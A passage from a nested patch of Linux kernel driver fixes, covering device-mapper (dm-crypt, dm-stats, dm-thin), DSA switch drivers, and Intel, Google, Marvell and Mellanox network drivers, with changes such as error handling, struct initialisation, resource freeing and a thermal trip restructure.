+-	queue_work(cc->io_queue, &io->work);
++	bio_endio(base_bio);
+ }
+ 
+ /*
+@@ -1933,6 +1935,7 @@ pop_from_list:
+ 			io = crypt_io_from_node(rb_first(&write_tree));
+ 			rb_erase(&io->rb_node, &write_tree);
+ 			kcryptd_io_write(io);
++			cond_resched();
+ 		} while (!RB_EMPTY_ROOT(&write_tree));
+ 		blk_finish_plug(&plug);
+ 	}
+@@ -2228,6 +2231,7 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * it is being executed with irqs disabled.
+ 		 */
+ 		if (in_hardirq() || irqs_disabled()) {
++			io->in_tasklet = true;
+ 			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+ 			tasklet_schedule(&io->tasklet);
+ 			return;
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index f105a71915ab6..d12ba9bce145d 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -188,7 +188,7 @@ static int dm_stat_in_flight(struct dm_stat_shared *shared)
+ 	       atomic_read(&shared->in_flight[WRITE]);
+ }
+ 
+-void dm_stats_init(struct dm_stats *stats)
++int dm_stats_init(struct dm_stats *stats)
+ {
+ 	int cpu;
+ 	struct dm_stats_last_position *last;
+@@ -197,11 +197,16 @@ void dm_stats_init(struct dm_stats *stats)
+ 	INIT_LIST_HEAD(&stats->list);
+ 	stats->precise_timestamps = false;
+ 	stats->last = alloc_percpu(struct dm_stats_last_position);
++	if (!stats->last)
++		return -ENOMEM;
++
+ 	for_each_possible_cpu(cpu) {
+ 		last = per_cpu_ptr(stats->last, cpu);
+ 		last->last_sector = (sector_t)ULLONG_MAX;
+ 		last->last_rw = UINT_MAX;
+ 	}
++
++	return 0;
+ }
+ 
+ void dm_stats_cleanup(struct dm_stats *stats)
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index 09c81a1ec057d..ee32b099f1cf7 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -21,7 +21,7 @@ struct dm_stats_aux {
+ 	unsigned long long duration_ns;
+ };
+ 
+-void dm_stats_init(struct dm_stats *st);
++int dm_stats_init(struct dm_stats *st);
+ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index d28c9077d6ed2..90df6c3da77a2 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -3357,6 +3357,7 @@ static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	pt->low_water_blocks = low_water_blocks;
+ 	pt->adjusted_pf = pt->requested_pf = pf;
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 
+ 	/*
+ 	 * Only need to enable discards if the pool should pass
+@@ -4235,6 +4236,7 @@ static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		goto bad;
+ 
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 	ti->flush_supported = true;
+ 	ti->accounts_remapped_io = true;
+ 	ti->per_io_data_size = sizeof(struct dm_thin_endio_hook);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index d727ed9cd623f..89bf28ed874c2 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2105,7 +2105,9 @@ static struct mapped_device *alloc_dev(int minor)
+ 	if (!md->pending_io)
+ 		goto bad;
+ 
+-	dm_stats_init(&md->stats);
++	r = dm_stats_init(&md->stats);
++	if (r < 0)
++		goto bad;
+ 
+ 	/* Populate the mapping, nobody knows we exist yet */
+ 	spin_lock(&_minor_lock);
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index e968322dfbf0b..70887e0aece33 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -263,7 +263,7 @@ static int b53_mmap_probe_of(struct platform_device *pdev,
+ 		if (of_property_read_u32(of_port, "reg", &reg))
+ 			continue;
+ 
+-		if (reg < B53_CPU_PORT)
++		if (reg < B53_N_PORTS)
+ 			pdata->enabled_ports |= BIT(reg);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 1757d6a2c72ae..38bf760b5b5ee 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -396,6 +396,9 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ /* Set up switch core clock for MT7530 */
+ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ {
++	/* Disable core clock */
++	core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
++
+ 	/* Disable PLL */
+ 	core_write(priv, CORE_GSWPLL_GRP1, 0);
+ 
+@@ -409,14 +412,19 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 		   RG_GSWPLL_EN_PRE |
+ 		   RG_GSWPLL_POSDIV_200M(2) |
+ 		   RG_GSWPLL_FBKDIV_200M(32));
++
++	udelay(20);
++
++	/* Enable core clock */
++	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
+-/* Setup TX circuit including relevant PAD and driving */
++/* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	u32 ncpo1, ssc_delta, trgint, i, xtal;
++	u32 ncpo1, ssc_delta, trgint, xtal;
+ 
+ 	xtal = mt7530_read(priv, MT7530_MHWTRAP) & HWTRAP_XTAL_MASK;
+ 
+@@ -433,6 +441,10 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
++		if (xtal == HWTRAP_XTAL_25MHZ)
++			ssc_delta = 0x57;
++		else
++			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+ 			/* PLL frequency: 150MHz: 1.2GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+@@ -452,23 +464,12 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (xtal == HWTRAP_XTAL_25MHZ)
+-		ssc_delta = 0x57;
+-	else
+-		ssc_delta = 0x87;
+-
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+ 	if (trgint) {
+-		/* Lower Tx Driving for TRGMII path */
+-		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-		/* Disable MT7530 core and TRGMII Tx clocks */
+-		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++		/* Disable the MT7530 TRGMII clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 
+ 		/* Setup the MT7530 TRGMII Tx Clock */
+ 		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+@@ -485,13 +486,8 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+ 			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+ 
+-		/* Enable MT7530 core and TRGMII Tx clocks */
+-		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-			 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-	} else {
+-		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+-			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+-				   RD_TAP_MASK, RD_TAP(16));
++		/* Enable the MT7530 TRGMII clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 	}
+ 
+ 	return 0;
+@@ -2206,6 +2202,15 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
++	/* Lower Tx driving for TRGMII path */
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_rmw(priv, MT7530_TRGMII_RD(i),
++			   RD_TAP_MASK, RD_TAP(16));
++
+ 	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index 7b9a2d9d96243..38df602f2869c 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -535,7 +535,10 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 				  struct ethtool_link_ksettings *cmd)
+ {
+ 	struct gve_priv *priv = netdev_priv(netdev);
+-	int err = gve_adminq_report_link_speed(priv);
++	int err = 0;
++
++	if (priv->link_speed == 0)
++		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index b97c95f89fa02..494775d65bf28 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -171,10 +171,10 @@ static char *i40e_create_dummy_packet(u8 *dummy_packet, bool ipv4, u8 l4proto,
+ 				      struct i40e_fdir_filter *data)
+ {
+ 	bool is_vlan = !!data->vlan_tag;
+-	struct vlan_hdr vlan;
+-	struct ipv6hdr ipv6;
+-	struct ethhdr eth;
+-	struct iphdr ip;
++	struct vlan_hdr vlan = {};
++	struct ipv6hdr ipv6 = {};
++	struct ethhdr eth = {};
++	struct iphdr ip = {};
+ 	u8 *tmp;
+ 
+ 	if (ipv4) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_common.c b/drivers/net/ethernet/intel/iavf/iavf_common.c
+index 34e46a23894f4..43148c07459f8 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_common.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_common.c
+@@ -661,7 +661,7 @@ struct iavf_rx_ptype_decoded iavf_ptype_lookup[BIT(8)] = {
+ 	/* Non Tunneled IPv6 */
+ 	IAVF_PTT(88, IP, IPV6, FRG, NONE, NONE, NOF, NONE, PAY3),
+ 	IAVF_PTT(89, IP, IPV6, NOF, NONE, NONE, NOF, NONE, PAY3),
+-	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY3),
++	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY4),
+ 	IAVF_PTT_UNUSED_ENTRY(91),
+ 	IAVF_PTT(92, IP, IPV6, NOF, NONE, NONE, NOF, TCP,  PAY4),
+ 	IAVF_PTT(93, IP, IPV6, NOF, NONE, NONE, NOF, SCTP, PAY4),
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 3dad834b9b8e5..5f8fff6c701fc 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -893,6 +893,10 @@ static int iavf_vlan_rx_add_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* Do not track VLAN 0 filter, always added by the PF on VF init */
++	if (!vid)
++		return 0;
++
+ 	if (!VLAN_FILTERING_ALLOWED(adapter))
+ 		return -EIO;
+ 
+@@ -919,6 +923,10 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* We do not track VLAN 0 filter */
++	if (!vid)
++		return 0;
++
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+ 	if (proto == cpu_to_be16(ETH_P_8021Q))
+ 		clear_bit(vid, adapter->vsi.active_cvlans);
+@@ -5078,6 +5086,11 @@ static void iavf_remove(struct pci_dev *pdev)
+ 			mutex_unlock(&adapter->crit_lock);
+ 			break;
+ 		}
++		/* Simply return if we already went through iavf_shutdown */
++		if (adapter->state == __IAVF_REMOVE) {
++			mutex_unlock(&adapter->crit_lock);
++			return;
++		}
+ 
+ 		mutex_unlock(&adapter->crit_lock);
+ 		usleep_range(500, 1000);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index 18b6a702a1d6d..e989feda133c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -1096,7 +1096,7 @@ static inline void iavf_rx_hash(struct iavf_ring *ring,
+ 		cpu_to_le64((u64)IAVF_RX_DESC_FLTSTAT_RSS_HASH <<
+ 			    IAVF_RX_DESC_STATUS_FLTSTAT_SHIFT);
+ 
+-	if (ring->netdev->features & NETIF_F_RXHASH)
++	if (!(ring->netdev->features & NETIF_F_RXHASH))
+ 		return;
+ 
+ 	if ((rx_desc->wb.qword1.status_error_len & rss_mask) == rss_mask) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 0752fd67c96e5..2c03ca01fdd9c 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -2438,8 +2438,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+ 			if (f->is_new_vlan) {
+ 				f->is_new_vlan = false;
+-				if (!f->vlan.vid)
+-					continue;
+ 				if (f->vlan.tpid == ETH_P_8021Q)
+ 					set_bit(f->vlan.vid,
+ 						adapter->vsi.active_cvlans);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index 3ba1408c56a9a..b3849bc3d4fc6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1384,15 +1384,15 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 	struct ice_vf *vf;
+ 	int ret;
+ 
++	vf = ice_get_vf_by_id(pf, vf_id);
++	if (!vf)
++		return -EINVAL;
++
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+ 		dev_info(ice_pf_to_dev(pf), "Trusted VF is forbidden in switchdev mode\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	vf = ice_get_vf_by_id(pf, vf_id);
+-	if (!vf)
+-		return -EINVAL;
+-
+ 	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index bf4317e47f948..b3aed4e2ca91c 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3841,9 +3841,7 @@ static void igb_remove(struct pci_dev *pdev)
+ 	igb_release_hw_control(adapter);
+ 
+ #ifdef CONFIG_PCI_IOV
+-	rtnl_lock();
+ 	igb_disable_sriov(pdev);
+-	rtnl_unlock();
+ #endif
+ 
+ 	unregister_netdev(netdev);
+diff --git a/drivers/net/ethernet/intel/igbvf/netdev.c b/drivers/net/ethernet/intel/igbvf/netdev.c
+index 3a32809510fc6..72cb1b56e9f24 100644
+--- a/drivers/net/ethernet/intel/igbvf/netdev.c
++++ b/drivers/net/ethernet/intel/igbvf/netdev.c
+@@ -1074,7 +1074,7 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 			  igbvf_intr_msix_rx, 0, adapter->rx_ring->name,
+ 			  netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_tx;
+ 
+ 	adapter->rx_ring->itr_register = E1000_EITR(vector);
+ 	adapter->rx_ring->itr_val = adapter->current_itr;
+@@ -1083,10 +1083,14 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 	err = request_irq(adapter->msix_entries[vector].vector,
+ 			  igbvf_msix_other, 0, netdev->name, netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_rx;
+ 
+ 	igbvf_configure_msix(adapter);
+ 	return 0;
++free_irq_rx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
++free_irq_tx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
+ out:
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/intel/igbvf/vf.c b/drivers/net/ethernet/intel/igbvf/vf.c
+index b8ba3f94c3632..a47a2e3e548cf 100644
+--- a/drivers/net/ethernet/intel/igbvf/vf.c
++++ b/drivers/net/ethernet/intel/igbvf/vf.c
+@@ -1,6 +1,8 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright(c) 2009 - 2018 Intel Corporation. */
+ 
++#include <linux/etherdevice.h>
++
+ #include "vf.h"
+ 
+ static s32 e1000_check_for_link_vf(struct e1000_hw *hw);
+@@ -131,11 +133,16 @@ static s32 e1000_reset_hw_vf(struct e1000_hw *hw)
+ 		/* set our "perm_addr" based on info provided by PF */
+ 		ret_val = mbx->ops.read_posted(hw, msgbuf, 3);
+ 		if (!ret_val) {
+-			if (msgbuf[0] == (E1000_VF_RESET |
+-					  E1000_VT_MSGTYPE_ACK))
++			switch (msgbuf[0]) {
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_ACK:
+ 				memcpy(hw->mac.perm_addr, addr, ETH_ALEN);
+-			else
++				break;
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_NACK:
++				eth_zero_addr(hw->mac.perm_addr);
++				break;
++			default:
+ 				ret_val = -E1000_ERR_MAC_INIT;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 3b5b36206c44b..1d9b70e0ff67f 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6000,18 +6000,18 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 		if (e->command != TC_TAPRIO_CMD_SET_GATES)
+ 			return false;
+ 
+-		for (i = 0; i < adapter->num_tx_queues; i++) {
+-			if (e->gate_mask & BIT(i))
++		for (i = 0; i < adapter->num_tx_queues; i++)
++			if (e->gate_mask & BIT(i)) {
+ 				queue_uses[i]++;
+ 
+-			/* There are limitations: A single queue cannot be
+-			 * opened and closed multiple times per cycle unless the
+-			 * gate stays open. Check for it.
+-			 */
+-			if (queue_uses[i] > 1 &&
+-			    !(prev->gate_mask & BIT(i)))
+-				return false;
+-		}
++				/* There are limitations: A single queue cannot
++				 * be opened and closed multiple times per cycle
++				 * unless the gate stays open. Check for it.
++				 */
++				if (queue_uses[i] > 1 &&
++				    !(prev->gate_mask & BIT(i)))
++					return false;
++			}
+ 	}
+ 
+ 	return true;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 7f8ffbf79cf74..ab126f8706c74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -709,6 +709,7 @@ err_unreg_netdev:
+ err_ptp_destroy:
+ 	otx2_ptp_destroy(vf);
+ err_detach_rsrc:
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2_detach_resources(&vf->mbox);
+@@ -762,6 +763,7 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2vf_vfaf_mbox_destroy(vf);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 0c23340bfcc75..0f8f3ce35537d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1412,6 +1412,7 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	struct mlx5e_macsec_aso *aso;
+ 	struct mlx5_aso_wqe *aso_wqe;
+ 	struct mlx5_aso *maso;
++	unsigned long expires;
+ 	int err;
+ 
+ 	aso = &macsec->aso;
+@@ -1425,7 +1426,13 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	macsec_aso_build_wqe_ctrl_seg(aso, &aso_wqe->aso_ctrl, NULL);
+ 
+ 	mlx5_aso_post_wqe(maso, false, &aso_wqe->ctrl);
+-	err = mlx5_aso_poll_cq(maso, false);
++	expires = jiffies + msecs_to_jiffies(10);
++	do {
++		err = mlx5_aso_poll_cq(maso, false);
++		if (err)
++			usleep_range(2, 10);
++	} while (err && time_is_after_jiffies(expires));
++
+ 	if (err)
+ 		goto err_out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+index 2449731b7d79a..89de92d064836 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+@@ -117,12 +117,14 @@ static int mlx5e_dcbnl_ieee_getets(struct net_device *netdev,
+ 	if (!MLX5_CAP_GEN(priv->mdev, ets))
+ 		return -EOPNOTSUPP;
+ 
+-	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
+-	for (i = 0; i < ets->ets_cap; i++) {
++	for (i = 0; i < IEEE_8021QAZ_MAX_TCS; i++) {
+ 		err = mlx5_query_port_prio_tc(mdev, i, &ets->prio_tc[i]);
+ 		if (err)
+ 			return err;
++	}
+ 
++	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
++	for (i = 0; i < ets->ets_cap; i++) {
+ 		err = mlx5_query_port_tc_group(mdev, i, &tc_group[i]);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 609a49c1e09e6..3b5c5064cfafc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4081,8 +4081,12 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 		}
+ 	}
+ 
+-	if (mlx5e_is_uplink_rep(priv))
++	if (mlx5e_is_uplink_rep(priv)) {
+ 		features = mlx5e_fix_uplink_rep_features(netdev, features);
++		features |= NETIF_F_NETNS_LOCAL;
++	} else {
++		features &= ~NETIF_F_NETNS_LOCAL;
++	}
+ 
+ 	mutex_unlock(&priv->state_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index a994e71e05c11..db578a7e7008a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -364,8 +364,7 @@ int mlx5_esw_acl_ingress_vport_bond_update(struct mlx5_eswitch *esw, u16 vport_n
+ 
+ 	if (WARN_ON_ONCE(IS_ERR(vport))) {
+ 		esw_warn(esw->dev, "vport(%d) invalid!\n", vport_num);
+-		err = PTR_ERR(vport);
+-		goto out;
++		return PTR_ERR(vport);
+ 	}
+ 
+ 	esw_acl_ingress_ofld_rules_destroy(esw, vport);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 43ba00d5e36ec..4b9d567c8f473 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -916,6 +916,7 @@ void mlx5_esw_vport_disable(struct mlx5_eswitch *esw, u16 vport_num)
+ 	 */
+ 	esw_vport_change_handle_locked(vport);
+ 	vport->enabled_events = 0;
++	esw_apply_vport_rx_mode(esw, vport, false, false);
+ 	esw_vport_cleanup(esw, vport);
+ 	esw->enabled_vports--;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 34790a82a0976..64e5b9f29206e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -3488,6 +3488,18 @@ static int esw_inline_mode_to_devlink(u8 mlx5_mode, u8 *mode)
+ 	return 0;
+ }
+ 
++static bool esw_offloads_devlink_ns_eq_netdev_ns(struct devlink *devlink)
++{
++	struct net *devl_net, *netdev_net;
++	struct mlx5_eswitch *esw;
++
++	esw = mlx5_devlink_eswitch_get(devlink);
++	netdev_net = dev_net(esw->dev->mlx5e_res.uplink_netdev);
++	devl_net = devlink_net(devlink);
++
++	return net_eq(devl_net, netdev_net);
++}
++
+ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 				  struct netlink_ext_ack *extack)
+ {
+@@ -3502,6 +3514,13 @@ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 	if (esw_mode_from_devlink(mode, &mlx5_mode))
+ 		return -EINVAL;
+ 
++	if (mode == DEVLINK_ESWITCH_MODE_SWITCHDEV &&
++	    !esw_offloads_devlink_ns_eq_netdev_ns(devlink)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Can't change E-Switch mode to switchdev when netdev net namespace has diverged from the devlink's.");
++		return -EPERM;
++	}
++
+ 	mlx5_lag_disable_change(esw->dev);
+ 	err = mlx5_esw_try_lock(esw);
+ 	if (err < 0) {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 987fe5c9d5a36..09ed6e5fa6c34 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,33 +36,39 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_thermal_trip {
+-	int	type;
+-	int	temp;
+-	int	hyst;
++struct mlxsw_cooling_states {
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
+-static const struct mlxsw_thermal_trip default_thermal_trips[] = {
++static const struct thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= 0,
+-		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{
+ 		/* In range - 40-100% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+-		.max_state	= MLXSW_THERMAL_MAX_STATE,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{	/* Warning */
+ 		.type		= THERMAL_TRIP_HOT,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
++	},
++};
++
++static const struct mlxsw_cooling_states default_cooling_states[] = {
++	{
++		.min_state	= 0,
++		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++	},
++	{
++		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.max_state	= MLXSW_THERMAL_MAX_STATE,
++	},
++	{
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
